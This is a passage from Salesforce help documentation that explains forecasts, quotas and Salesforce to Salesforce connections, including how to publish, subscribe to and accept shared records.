your own custom views.To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click Add to grant other users or groups access to the forecast data.

Note:  Manual sharing extends to the opportunity data that makes up the forecast. If a user has permission to
override forecast data, then the user also has permission to override the opportunity forecast data.

• Click Expand List to view all users that have access to the forecast data.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.

See Also:
Defining Customizable Forecast Settings
Setting Up Customizable Forecasting

Submitting Customizable Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View All Forecasts”To see forecasts of other users:

“Override Forecasts”To override your forecast:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

On the Forecasts tab, your forecast totals are always available to you and users above you in your role hierarchy. However,
forecast totals are only available in forecast history and reports after you submit them. You can submit your own forecast or
any forecast data that has been manually shared with you and you have permission to submit.

To submit your forecast:

1. Click Submit from your forecast on the Forecasts tab.
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2. Click OK to confirm. Salesforce takes a snapshot of your forecast totals and makes them available in reports and your
forecast history.

See Also:
Viewing Customizable Forecasts
Managing Customizable Forecasts

ESTIMATING REVENUE WITH FORECASTS

Forecasts Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

A forecast is your best estimate of how much revenue you can generate in a quarter. This amount is divided between Commit
Amount - the amount you can confidently close - and Best Case Amount - the total amount of revenue you might possibly
generate. A manager’s forecast should include the amount of revenue the entire team can generate together.

The Forecasts tab displays a home page that lets you quickly create and locate forecasts and quotas. The Forecasts tab also
displays your monthly revenue projections, the amount of open opportunities in your pipeline, and the amount of your
closed/won opportunities. Managers’ forecasts also show a roll-up of forecast data for users that report to them.

See Also:
Forecasts Home
Tip sheet: Forecasts: Assessing Your Position

Forecasts Home
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

Clicking the Forecasts tab displays the forecasts home page.
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• In the Forecast Views section, select a list view from the drop-down list to go directly to that list page, or click Create
New View to define your own custom view.

• In the Forecast Summary section, the current quarter’s forecast numbers display by default. To see another quarter’s
forecast, select it from the drop-down list. From the summary, click the View button or the Totals link to go to the forecast
detail. Click Edit to edit the forecast.

• Under Quick Create, choose the forecast quarter to add a new forecast.

• Under Forecast Reports, click a report name to jump to that report.

• In the Quota Assignment section, click the link to create a new quota. Or, edit your forecast to change that quarter’s
quota.

See Also:
Forecasts Overview
Displaying Forecasts

Viewing Forecast Lists
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

The forecasts list page displays a list of forecasts in your current view. From this page, you can view detailed forecast information
and access related information on opportunities that contribute to forecast results.

• Click on a specific forecast to view the detail. Click Edit or Del next to the forecast entry to edit or delete it. See Displaying
and Editing Forecasts on page 1210.

• Click New Forecast to create a forecast.

• Click any column heading on the list page to sort the forecasts in ascending order using that column’s information. Click
the heading a second time to sort in descending order.

See Also:
Forecasts Home
Displaying Forecasts

Displaying and Editing Forecasts
Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

See the following to display and edit forecasts:
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• Displaying Forecasts

• Editing Forecasts

• Setting Forecast Currency

See Also:
Displaying Forecasts
Editing Forecasts

Displaying Forecasts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

Once you have located a forecast on the forecasts home or list pages, click View or the forecast name to display detailed
information.

At the top of the page, the table shows the forecast fields, which can contain calculated values or information that you entered
(see Forecast Fields on page 1216). Click Edit to edit the forecast (see Editing Forecasts on page 1211).

For organizations that use multiple currencies, all forecast and opportunity amounts are converted and displayed in your
personal currency. The actual amount fields in the opportunity are not affected. Click Change Currency to modify the default
currency of the forecast (see Setting Forecast Currency on page 1212).

The lower part of the forecast detail page shows forecast details in blue and related opportunities in yellow:

• For each of the months in the forecast, you can click on individual opportunities to display additional detail. Click New
to add opportunities for that month in the forecast.

• In the Team Forecasts related list (see Team Forecasts on page 1213), managers see a roll-up of amounts for their team.

• In the Forecast History related list (see Forecast History on page 1213), you can see the history of the changes for the forecast.

To return to the last list page you viewed, click Back to list at the top of the forecast detail page.

Editing Forecasts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.
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To change your forecast, choose Edit from the forecast home page or detail page. If you are creating a new forecast, see Creating
Forecasts on page 1215.

1. For each opportunity, adjust the Forecast Category value, if necessary.

• The entire Amount of the opportunity is added to the category you choose. The Expected Revenue is not used in
the calculation.

• Choose the Omitted category to remove the opportunity from the commit, best case, and pipeline totals.

2. To see the resulting changes to the forecast numbers, click Recalculate. The forecast fields are recalculated based on:

• The Amount fields of the opportunities in each Forecast Category, and
• Any Forecast Category changes you have made, and
• If you are a manager in the role hierarchy, any changes your team has made to their forecasts.

Note that the Pipeline number is not updated until you save the forecast.

3. If necessary, adjust your Quota, Commit Amount, and Best Case Amount.
4. To make the changes permanent, click Save. This saves the recalculated totals and any changes you have made to quotas,

the Commit Amount and Best Case Amount columns, or to the Forecast Category for specific opportunities.
Saving also updates the Pipeline number for the forecast.

For organizations that use multiple currencies, all forecast and opportunity amounts are converted and displayed in your
personal currency. The actual amount fields in the opportunity are not affected.

Note:  Any change you make to the Stage field while editing an opportunity resets the Forecast Category.
Your administrator sets the correspondence between Forecast Category and Stage in the Stage picklist.

See Also:
Displaying Forecasts
Displaying and Editing Forecasts

Setting Forecast Currency

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

For organizations that use multiple currencies, all forecast amounts are shown in your personal currency, by default. If you
have opportunities in different currencies, those amounts are converted to your personal currency for display; the actual amounts
in the opportunity are not affected. Likewise for managers, their team’s forecast amounts are converted to the manager’s
personal currency. The manager can drill down into the user’s forecast and opportunities to see the amounts in the original
currencies.

To change the currency for your forecast:
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1. View the forecast, and click Change Currency.
2. Choose a currency from the list, and click Save. All amounts are converted to the new currency.

If you change the currency for the quota associated with the forecast, the currency of the forecast also changes.

See Also:
Displaying and Editing Forecasts

Forecast History

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

The Forecast History related list of a forecast detail page tracks the changes to the forecast. Any time you change the Quota
(either from the forecast detail page or from the Personal Information pages), Commit Amount, or Best Case Amount
numbers, a new entry is added to the Forecast History related list. All entries include the date, time, and the forecast totals at
the time of the change.

From the Reports tab, you can view the Forecast History report which shows the forecast history for your forecasts, subtotaled
by opportunity.

See Also:
Viewing Forecast Lists
Forecasts Home

Team Forecasts

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

On forecast pages, managers see their own opportunities, plus a roll-up of forecast data for users that report to them.

Note:  If your team members have not created forecasts for the quarter, no information is displayed for them.
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• On the forecast detail page, the Team Forecasts related list displays forecast data for each user that reports to you. These
amounts are totaled to give you a complete roll-up for your team. Click a user’s name to view that user’s forecast detail, or
click Edit to edit that user’s forecast.

• On the forecast edit page, each month has a Team Forecast related list so you can view a roll-up of opportunities and
forecast amounts for each month.

• For organizations with multiple currencies, the team members’ forecasts are converted and displayed in the currency of the
manager’s forecast. Click a user’s name to drill down and view amounts in their original currencies.

See Also:
Viewing Forecast Lists
Forecasts Home

Adding and Editing Quotas
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

You can track your sales quotas on a quarterly basis. To add or edit a quota, go to your forecast for the quarter, or go to your
personal information page in your personal settings.

To create a new quota from the personal information page:

1. Click New in the Quotas related list.
2. Select the year and quarter, and click Next.

By default, the page displays the quarter that follows the last quota you created. The year you select should be based on
your organization’s Fiscal Year Starts In settings.

3. Enter amounts for each month. Do not include any currency symbols. If your organization uses multiple currencies, your
quota is created in your personal currency by default.

4. Click Save to finish. Creating a quota automatically creates the corresponding forecast for that quarter.

To edit a quota, click the quota name in the Quotas related list. Editing the quota amounts automatically logs an entry to the
Forecast History related list of the corresponding forecast (see Forecast History on page 1213).

Note:  Managers should enter their quota amounts as a sum of their entire team’s quotas.

If your sales group does not break down quotas monthly, enter zeroes for the first two months and put the entire
amount in the third month.
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If your organization uses multiple currencies, click Change Currency in the Quotas related list to change the currency of the
quota. All quota and forecast values are automatically converted to the new currency using the conversion rates maintained by
your administrator.

See Also:
Displaying and Editing Forecasts

Creating Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

To create a new forecast:

1. Click New Forecast.
2. Choose the year and quarter for the forecast, and click Next. The year you select should be based on your organization’s

Fiscal Year Starts In settings.
3. Enter the Quota for each of the months in the forecast.
4. Verify, and adjust if necessary, the Forecast Category for the opportunities in the forecast.

If you change any of the Forecast Category values, click Recalculate to update the forecast numbers. Note that the
Pipeline number is not updated until you save the forecast.

5. If necessary, adjust the calculated values for the Commit Amount and Best Case Amount fields. Managers’ estimates
should include the amount of revenue they and their entire team can generate.

6. Click Save.

If Quick Create is enabled by your administrator, you can also add a new forecast on the forecasts home page, or just by
creating a quota for the quarter in your personal information.

See Displaying Forecasts on page 1211 for an explanation of the forecast display.

See Also:
Displaying and Editing Forecasts
Forecasts Home
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Forecast Fields
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

A forecast has the following fields, listed in alphabetical order.

DescriptionField

Percentage of quota that you are committing to. Calculated
as Commit Amount divided by Quota. (Read only)

% Quota

Total sales amount you might possibly close. Includes
closed/won opportunities plus opportunities with the Commit
and Best Case categories.

Best Case Amount

Automatically calculated total of closed/won opportunities.
For managers, this number includes all closed/won
opportunities for their entire team. (Read only)

Closed

User who created the forecast including creation date and
time. (Read only)

Created By

Total sales amount you are confident of closing. Includes
closed/won opportunities plus opportunities with the Forecast
category.

Commit Amount

Category that determines the column in which an opportunity
is totaled in the forecast. The default setting for an opportunity
is tied to its Stage.

Forecast Category

User who last changed the forecast fields, including
modification date and time. This does not track changes made
to any of the opportunities on the forecast. (Read only)

Modified By

Months included in the forecast. Opportunities with a close
date in that month are included for that month (except those
in the Omitted category). (Read only)

Month

Automatically calculated total of open opportunities. For
managers, this number includes all open opportunities for

Pipeline

their entire team. Closed/lost opportunities and those marked
with the Omitted category are not tabulated in the pipeline.
(Read only)
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DescriptionField

Quota for a particular month or quarter. For managers, this
number should equal the quota for them and their entire team.

Quota

See Also:
Editing Forecasts

Deleting Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Forecasts (Classic) and not to Collaborative Forecasts or Customizable Forecasts.

To delete a forecast, click Del next to the forecast in the forecasts list page, or click Delete on the forecast detail page. Deleted
forecasts cannot be retrieved from your Recycle Bin.

You can delete a forecast if you are an administrator, the forecast owner, or a user above the forecast owner in the organization
role hierarchy.

See Also:
Displaying and Editing Forecasts
Forecasts Home
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SELLING THROUGH MULTIPLE CHANNELS

SHARING SALESFORCE INFORMATION WITH BUSINESS
PARTNERS

Salesforce to Salesforce Overview
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Salesforce to Salesforce enables business collaboration both within and across Salesforce organizations. This allows you to
share certain records with your business partners that use Salesforce and get real-time updates on the shared data. For example,
you can share lead and opportunity data with business partners and manage your entire pipeline and programs within Salesforce.

Salesforce to Salesforce allows you and your business partners to collaborate more easily and effectively. With Salesforce to
Salesforce, you can share records with one or more connections, and each connection can accept records you share with them
- even if other connections have accepted the same record.

Salesforce to Salesforce allows your business partners to:

• Access all their programs from one place

• Easily integrate your data with the data they manage in Salesforce

• Integrate their business processes with updates received from you

Salesforce to Salesforce allows you to:

• Have 100% visibility into your partner activity

• Manage your entire pipeline, both internal sales and channel sales, in one place

• Rapidly and easily share data across multitiered partnerships

• Integrate your business processes with updates received from your partners using workflow and assignment rules

If you want to connect to partners but aren't sure if they use Salesforce, you can use connection finder to find out.

If you receive an invitation to connect with a business partner using Salesforce to Salesforce, see Accepting or Rejecting an
Invitation to Join Salesforce to Salesforce on page 1220.

To invite other companies to connect with you using Salesforce to Salesforce, see Inviting Business Partners to Connect using
Salesforce to Salesforce.

See Also:
Tips for Using Salesforce to Salesforce
Finding Out if Your Partners Use Salesforce
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Inviting Business Partners to Connect using Salesforce to
Salesforce

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To invite to a business partner to connect using Salesforce to
Salesforce:

Before you can start sharing data with your business partners, you need to set up a connection to them using Salesforce to
Salesforce. To create that connection, you need to invite your business partner.

Note:  Before beginning the invitation process, you need to create an account and an associated contact for your
business partner.

To invite a business partner to connect using Salesforce to Salesforce:

1. Click the Connections tab.
2. Click New.
3. Enter a contact name or use the lookup icon to select a contact.

Important:  Make sure that the email address is valid; otherwise, your invitation may be sent to the wrong person.

4. Optionally, select a related account.

Note:  The account associated with the connection can be changed after the invitation is sent.

5. Choose a user to manage the connection.
6. Optionally choose a template to apply to the connection.
7. Click Save & Send Invite.

To invite multiple business partners to connect using Salesforce to Salesforce:

1. Click the Contacts tab.
2. Select a standard or custom list view, then click Go!.
3. In the list view, select the checkboxes next to the contacts you want to invite.

Important:  Make sure that the email addresses are valid; otherwise, your invitations may be sent to the wrong
people.

4. Click Invite to Connect.
5. Choose a user to manage the connection.
6. Optionally choose a template to apply to the connection.

1219

Inviting Business Partners to Connect using Salesforce to
Salesforce

Sharing Salesforce Information with Business Partners



7. Click Save & Send Invite.

The people you invite will receive an email invitation to connect with you using Salesforce to Salesforce. They can choose to
accept or decline your invitation. You can check whether they have accepted or declined the invitation by reviewing your
connections on the Connections tab. From the Connections tab you can also resend or cancel the invitation. For more
information about connections, including information about activating an accepted connection, see Connections Home Page
on page 1221.

See Also:
Finding Out if Your Partners Use Salesforce
Connection Templates in Salesforce to Salesforce
Creating and Applying Connection Templates

Accepting or Rejecting an Invitation to Join Salesforce to
Salesforce

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To accept or reject an invitation to connect using Salesforce
to Salesforce:

If a business partner sent you an invitation to connect using Salesforce to Salesforce, you can accept or reject that invitation
by following these steps:

1. Click the link in the invitation email to go to the Salesforce login page.
2. Log in as the System Administrator or as a user with the “Manage Connections” permission.
3. Review the details of the invitation.
4. Click Accept or Decline.

If you aren't sure whether you want to accept or decline, click Decide Later. The invitation displays on the Connections
tab with a connection status of Invitation Received. You can easily accept or decline it at a later date.

When you accept or reject an invitation, the company that invited you receives an email notifying them of your decision. The
content of that email can be configured by changing the appropriate email template..

See Also:
Salesforce to Salesforce Overview
Tips for Using Salesforce to Salesforce
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Connections Home Page
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To manage connections for Salesforce to Salesforce:

“Manage Connections”To manage templates for Salesforce to Salesforce:

The Connections tab allows you to manage your Salesforce to Salesforce connections and connection templates. From the
Connections tab, you can:

• Select the Connections subtab to manage connections. Connections include everyone that you have invited, whether they
have accepted, declined, or have not yet responded, as well as all the invitations you have received. Recent connections are
automatically displayed on the Connections subtab.

◊ To view details about a connection, click the connection name.

◊ To invite new connections, click New, then enter the connection details and click Save & Send Invite.

◊ To deactivate a connection, click Deactivate.

◊ For invitations to connect that have been sent but not accepted, you can click Resend to resend the invitation, or Cancel
Invitation to cancel the invitation. For more information about inviting connections, see Inviting Business Partners
to Connect using Salesforce to Salesforce on page 1219.

• Select the Templates subtab to manage connection templates. Templates allow you to define and publish sets of objects
and fields to one or more connections. Recent templates are automatically displayed on the Templates subtab.

◊ To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to
define your own custom views. To edit or delete any view you created, select it from the View drop-down list and click
Edit.

◊ To view details about a template, click the template name.

◊ To create a new template, click New.

◊ To edit a template, click Edit next to the template you want to edit. For more information about using templates, see
Creating and Applying Connection Templates on page 1224.

See Also:
Managing Connections
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Managing Connections
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To manage connections:

From the Connections tab, you can view connection details and manage connections. The connection details include information
on the status of the connection, the owner of the connection, information about the company, published and subscribed fields,
and a connection history.

To view a connection:

1. Click the Connections tab.
2. On the Connections subtab, click the name of the connection that you want to view.

From the connection detail page, you can:

Accept an Invitation

If a business partner has sent you an invitation to connect using Salesforce to Salesforce, you can click Accept to accept
the invitation. After you accept the invitation, you can subscribe to objects that the connection has published and you
can begin sharing objects with the connection by using the Published Objects and Subscribed Objects related lists on a
connection detail page.

Cancel an Invitation

If an invitation was sent, but not accepted, you can cancel the invitation by clicking Cancel Invitation. If your partner
has not received the invitation, click Resend to send it again.

Deactivate Connections

If you have created a connection with a business partner and you no longer wish to use the connection, click Deactivate.
All records that you have accepted from that connection continue to be maintained in your organization. All records
that you have shared with that connection also continue to be maintained in their organization, but the shared record
will no longer be updated. Records you sent to your connection and that they did not accept will be removed from their
organization, and vice versa.

Edit Connections

When displaying the connection, you can modify the connection by editing the connection details. To change the objects
published to a connection, click Publish/Unpublish, or to use a connection template, click Edit and select an active
template. To edit the published fields on an object, click Edit next to the object. To change the objects to which you
subscribe, click Subscribe/Unsubscribe. For more information, see the following:
• Publishing Objects in Salesforce to Salesforce on page 1233

• Subscribing to Objects in Salesforce to Salesforce on page 1226

• Publishing Fields in Salesforce to Salesforce on page 1234

• Subscribing to Fields in Salesforce to Salesforce on page 1227
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View Connection History

You can view a detailed history of the connection in the Connection History related list of the connection detail page.
To export the connection history, select Download connection history (csv). This allows you to download a
comma-separated values file that includes the following information:
• Connection status changes

• Changes to which account is associated with the connection

• Changes to which contact is associated with the connection

• Connection owner changes

• Changes to published fields

• Email communications sent to your business partners

• Errors related to validation rules and Apex triggers with validation rules resulting from:

◊ Records manually accepted

◊ Records automatically accepted

◊ Records updated by Connection User

Note:  System errors, for example, code errors, aren’t logged in the Connection History.

See Also:
Connections Home Page
Connection Templates in Salesforce to Salesforce

Connection Templates in Salesforce to Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To create, edit, and view connection templates:

Connection templates allow you to define objects and fields that can be published to connections. Connection templates can
be assigned to one or more connections, making the process of publishing fast and easy. From the Connections tab, click the
Templates subtab to view, create, and edit connection templates.

When a connection template is applied to a connection, the object and field rules are applied to that connection.

The following rules apply to connection templates:

• Objects and fields that are not already published but are published in the connection template are published.

• Objects and fields that have the same publish or unpublish status as the template are unchanged.
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• Objects and fields that are already published but are not published in the connection template are unpublished.

See Also:
Creating and Applying Connection Templates
Connections Home Page

Creating and Applying Connection Templates
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To create, edit, and view connection templates:

Creating and Editing Connection Templates

Connection templates allow you to define object and field publishing rules that can be applied to one or more connections.

To create a connection template:

1. Select the Connections tab.
2. Select the Templates subtab.
3. Click New.
4. Type a name and an optional description.
5. Select the Active checkbox if you want to be able to assign the template to connections.
6. Click Save to save the template, or click Save & Add Objects to add objects to the template.
7. If you clicked Save & Add Objects, select the checkboxes next to the objects you want to add, then click Save.

Note:  If you clicked Save, you can click Add/Remove Objects on the template detail page to add objects.

8. Click Edit next to an object you added to the Published Objects related list.
9. Select the fields you want to publish for the object, then click Save.
10. Repeat steps 8 and 9 for each object you added to the Published Objects related list.

To edit a connection template, you can click Edit next to the template you want to edit on the Templates subtab. Alternatively,
you can click Edit on a template detail page. After you have made the necessary changes, click Save to save the template or
Save & Add Objects to add or remove objects.

To deactivate a connection template:

1. On the Templates subtab, click Edit next to the template you want to deactivate. Alternatively, click Edit on the template
detail page.

2. Deselect the Active checkbox.
3. Click Save.
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Note:  Only active connection templates can be assigned to connections.

Assigning Connection Templates to Connections

You can assign connection templates to connections when inviting one or more new connections, or you can assign connection
templates to existing connections.

To assign a connection template to an existing connection:

1. Select the Connections tab.
2. Select the Connections subtab.
3. Click the name of the connection you want to assign the template to.
4. Click Edit.
5. In the Template field, type the name of the template or click the lookup icon to search for a template.
6. Click Save.

See Also:
Connection Templates in Salesforce to Salesforce
Connections Home Page

Sharing Records Using Salesforce to Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Once you have created a connection to another organization, you can share data with them. Your business partners do not
have direct access to your record; they have a record in their organization that is connected, using Salesforce to Salesforce, to
your record. Any updates to the shared information on either record is reflected on the other record. You can share records
with one or more connections. Each connection has the opportunity to accept shared records, even if other connections have
also accepted the same record.

Note:  Making records available to business partners using Salesforce to Salesforce is not the same as sharing records
within your organization.

You can control the type of records you share with your business partners by selecting which objects and fields to publish.

In addition, you can control how the information your business partner makes available to you is used in your organization by
subscribing to objects and mapping the fields on those objects to fields on your own objects.

Individual records and their related records are made available to your connections by forwarding the record to one or more
connections, or by assigning the record to a queue that contains connections. When you forward a record to a connection, you
can select which related records to include, and you can send your connection contact an email notification that a record has
been made available.

Similarly, your business partners can make records available to you. When a record has been made available to you by a business
partner, you can view basic details about the record from a view on the object's home page. Then you choose whether to accept
the record, and its related records, or not. Additionally, when subscribing to an object, you can specify that the object's records
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are automatically accepted when shared by your connection. This is particularly helpful if you're expecting the connection to
share a large volume of records.

Once you have accepted a record, you can make it available to other connections in the same way you can make any record
available using Salesforce to Salesforce. This allows you to work in a multi-tiered business network. In a multi-tiered network,
changes made to the shared record in any organization updates the information in all the organizations that are sharing the
record.

See Also:
Publishing Fields in Salesforce to Salesforce
Subscribing to Fields in Salesforce to Salesforce
Tips for Using Salesforce to Salesforce

Subscribing to Objects in Salesforce to Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To subscribe to published objects :

When you are connected to a business partner using Salesforce to Salesforce, you can subscribe to objects that your business
partner has published. When you subscribe to an object, you map it to an object in your organization. Standard objects must
map to standard objects in your organization, but you can map custom objects to any custom object. For example, if your
business partner has published a custom object named Prospects, you can map that to a custom object named Client.

To subscribe to objects for a connection:

1. Click the Connections tab.
2. Click the name of the connection you want to modify.
3. In the Subscribed Objects related list, click Subscribe/Unsubscribe.
4. Choose the objects you want to subscribe to by selecting the object in your organization you want mapped to that object.

Select --None-- if you do not want to subscribe to a published object.
5. Select the Auto-Accept checkbox next to an object if you want to automatically accept records of that type when shared

by your connection. The checkbox appears once you select a mapping.

Note:  This checkbox is not available for:

• Child objects. Opportunity products, tasks, and public case comments are automatically accepted when the
parent record is accepted. Attachments are automatically accepted if marked public and the Share With
Connections checkbox is selected.

• Objects that have one or more master objects, such as custom junction objects or detail objects in a master-detail
relationship.

Additionally, Auto-Accept does not apply to any record that is shared as the child of another record, for example
a case record that is the child of a case record that you already accepted.
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6. Click Save.

Note:  If your business partner stops publishing an object to which you are subscribed, you are automatically
unsubscribed from that object.

Once you have subscribed to an object, you can map published fields on that object to fields on your object. For example, you
can map the Description field on leads to a custom field on leads called Partner Description. This would allow you
to use your own field to describe the lead for users within your organization rather than using the description provided by your
business partner.

Additional Considerations

• If you choose to auto-accept leads or cases, any active assignment rules in your organization run when a record is automatically
accepted.

• In order to automatically accept a record shared by your connection, the connection owner for that record must be an active
user.

Subscribing to Fields in Salesforce to Salesforce
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Connections”To subscribe to published fields :

When you accept an invitation from a business partner to join Salesforce to Salesforce, you can subscribe to fields that your
business partner has published and map those fields to your fields. When your business partner updates the fields on a record
that you are sharing, the fields will be updated on the shared record in your organization.

For example, if your business partner has published the Description field, you could map that field to a custom field called
Partner Description. This would allow you to use your own field to describe the lead for users within your organization.

Note:  Changes to field mappings and picklist values may not show up in your business partner's organization for up
to 15 minutes while Salesforce refreshes the cache. This cache enables us to support larger transaction volumes and
reduce the number of API calls that count against your organization's limits.

To map fields on a subscribed object:

1. Click the Connections tab.
2. Click the name of the connection you want to modify.
3. In the Subscribed Objects related list, click Edit next to the subscribed object.
4. Map your business partner's published fields to your organization's fields by choosing the appropriate field in the drop-down

list. Because fields can only be mapped to fields with the same data type, length (for text and numeric fields), and decimal
places (for numeric fields), the drop-down list only shows fields with the correct data type. Select --None-- if you do not
want to populate any of your fields with the data from a published field.
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Tip:  When subscribing to fields, you can see the data type details of the published field by hovering your mouse

over the information icon ( ) next to the field.

Alternatively, select Automatically map fields to automatically map your business partner's fields to your fields.
For any unmapped field, Salesforce checks if the field's API name matches that of any of your fields. If there are no matches,
Salesforce then checks for matching field labels. If Salesforce still cannot find a match, --None-- is selected.

The following standard fields are automatically mapped:

• Account: Account Name, and, if you are using person accounts, Last Name

• Attachment: Body, Content Type, File Name

• Case: Subject
• Case Comment: Body and Published
• Contact: Last Name

• Custom Object: Name
• Lead: Last Name and Company
• Opportunity: Name, Closed Date, and Stage
• Product: Product Name

• Task: Subject
• Opportunity Product: Quantity, Sales Price

Note:  Selecting Automatically map fields does not overwrite previous selections. Deselecting the checkbox
does not affect fields that were mapped in a previous transaction.

Changes that result from selecting this checkbox are not applied until you click Save.

5. If the field is a picklist, click Edit Value to map the published picklist values to your organization's picklist values. You
can map each value in the published picklist to a value in your picklist.

Note:  If a picklist value is mapped to --None--, and your business partner sets the field to that value, the field
will be set to the same value in your record. For example, you subscribe to the Lead Status picklist, and your
business partner has the value Internal in that picklist, your record will have a lead status of Internal.

6. Click Save.

Consider the following when mapping fields on a subscribed object:

• Salesforce to Salesforce displays the API label for each field.

• You are automatically unsubscribed from a field if:

◊ your business partner no longer publishes that field

◊ you delete a custom field that is mapped to a published field

◊ the field type of a custom picklist or custom multi-select picklist is changed, for example, if a custom picklist is changed
to a text field

• To convert a custom field to a picklist field, stop publishing the field, change the field type, then publish the field again.

• If you map a currency field, and a record shared by your connection uses a currency that your organization has not enabled,
that currency field will not be updated when your organization auto-accepts the record. For example, your connection has
shared an opportunity with you. Your organization uses the Euro only. Your connection updates the opportunity and sets
the opportunity amount to $300. The opportunity amount will not update in your organization's record because your
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organization doesn't support the U.S. Dollar. If you’re manually accepting the record, the currency is updated only if your
organization uses the same currency as the record.

• If you map a currency field and either you or your connection changes the currency on a record containing that field,
updates you make to the field will no longer be propagated to the other organization and updates your connection makes
to the field won’t be reflected in your organization.

• If your connection is using person accounts, and you are not, the person account Last Name is used as the Account
Name when your connection shares a person account record with you. If you enable person accounts, you are automatically
subscribed to Last Name. Any changes to Last Name and Account Name are synchronized.

• You can’t map a standard number field to a custom number field.

• You can map lookup fields to text fields that have a length of 80 or more characters. If your connection edits a lookup field
that you have mapped to a text field, the text field will be updated with their changes.

• You can map auto number fields to text fields that have a length of 30 or more characters.

• You can map formula fields to fields of the same data type; for example, a formula field that has a number data type can
be mapped to a field with a number data type. If a formula field is a text data type, it can be mapped to a text field with a
length of 80 or more characters. Conversely, fields cannot be mapped to formula fields; for example, a formula field with
a currency data type can be mapped to a currency field, but a currency field cannot be mapped to a formula field. System
audit fields are not supported.

• You can map roll-up summary fields to currency fields with the same currency type. For example, a roll-up summary with
the currency type U.S. Dollar can be mapped to a currency field that uses the U.S. Dollar. System audit fields are not
supported.

• If Quantity Schedules or Revenue Schedules are enabled in your connection's organization and you subscribe to the Products
object from that connection, you must subscribe to the following fields and map them to the matching fields in your
organization:

Fields to MapType of Schedule

Quantity Schedule ◊ Number of Quantity Installments

◊ Quantity Installment Period

◊ Quantity Schedule Type

Revenue Schedule ◊ Number of Revenue Installments

◊ Revenue Installment Period

◊ Revenue Schedule Type

See Also:
Managing Connections
Publishing Fields in Salesforce to Salesforce
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Accepting Records Shared from a Connection
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” and “Edit” on the objectTo accept shared records:

Salesforce to Salesforce allows you to accept records that have been made available to you by business partners with whom you
have connections. When accepting a record, you can assign it to yourself, another user, a queue, or, if it is a lead or case, use
your organization's assignment rules to automatically assign it. If the record is a child of another record you have accepted,
you can assign it to the parent record when accepting it. Additionally, when subscribing to an object, you can specify that the
object's records are automatically accepted when shared by your connection.

If validation rules prevent you from accepting shared records, create a validation rule with the Received Connection
Name field not equal to null; this will ignore validation rules for records you accept from your connections. To create this rule,
use the following formula:

IF(OR(ISNEW(), ISBLANK(Id)), if(ConnectionReceivedId =null, TRUE,
FALSE),NOT(AND(ISCHANGED(ConnectionReceivedId),
NOT(ConnectionReceivedId = null))),
NOT(Contains($User.Alias, "pnet")))

You should also create a similar rule for any Apex trigger that has validation checks.

Note:  If an error occurs when accepting a record, see the Connection History for details.

To accept records that have been made available to you:

1. Select the tab of the record type you are accepting.
2. Select a connections list view and click Go!. For example, on the Leads tab, in the Leads from Connections section, select

a list view from the drop-down list and click Go!.

Note: To view records shared by a connection, you must either have the “Manage Connections” permission or
have access to the list view.

3. For accounts, contacts, and opportunities, click Accept next to the record you want to accept. For cases, leads and custom
objects, select the checkbox next to the records to accept, then click Accept.

Note:  If a record is a child of a record you have accepted, the name of the parent record is displayed in the Parent
Record Name column. If the record is a parent record or has no parent record, this column is blank.

When you accept a record that has public attachments, the attachments are automatically accepted if you selected
the Share With Connections checkbox on the attachment.
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Accepting Opportunity Records

When you accept an opportunity, you have the option to relate the opportunity to an object and a price book, and to relate
the opportunity to a new account or opportunity, or to use an existing account or opportunity. If you create a new opportunity
or account, you can also set the owner of that record.

Accepting Account Records

